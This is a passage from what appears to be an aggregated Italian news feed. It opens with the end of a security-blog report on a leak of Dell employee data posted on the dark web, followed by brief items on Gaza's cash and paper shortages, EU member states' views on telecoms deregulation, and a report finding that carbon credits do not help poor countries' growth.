Post found on the dark web
Although no cleartext passwords or other personally identifiable information were included, the leak still poses a significant threat to Dell. Attackers could use this information for phishing attacks or phone scams targeting employees. The incident also follows another data breach in May 2024, in which the data of 49 million customers was compromised.
Conclusions
This is not Dell's first such incident; the company has faced similar problems in the past. Once again, the breach underlines the importance of implementing robust security measures and carrying out regular audits to protect sensitive data.
As is our custom, we leave room for a statement from the company should it wish to provide updates on the matter. We will be happy to publish such information in a dedicated article.
RHC will monitor developments and publish further news on the blog if there are substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.
The article “Nuovo Data Breach in Dell: rivelate informazioni riservate di oltre 10mila utenti” originally appeared on il blog della sicurezza informatica.
Paper and banknotes in need of repair: Gaza's micro-economy
@Notizie dall'Italia e dal mondo
What little money people have in their pockets is falling apart; improvised hospitals and schools lack paper to write on. People make a virtue of necessity, but it is not enough: the economic crisis in the new UN figures
pagineesteri.it/2024/09/20/med…
Council working document shows member states not on board with Letta, Draghi reports
Responses from EU member states to the Hungarian Presidency's first draft conclusions on the telecoms sector show that countries remain largely unconvinced by Letta and Draghi's arguments for deregulating the sector.
It is not true that carbon credits enrich poor countries
@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
A report finds that projects issuing carbon credits do not contribute to the economic growth of the countries in which they are located
The article “Non è vero che i carbon credits arricchiscono i Paesi poveri” originally appeared on Valori.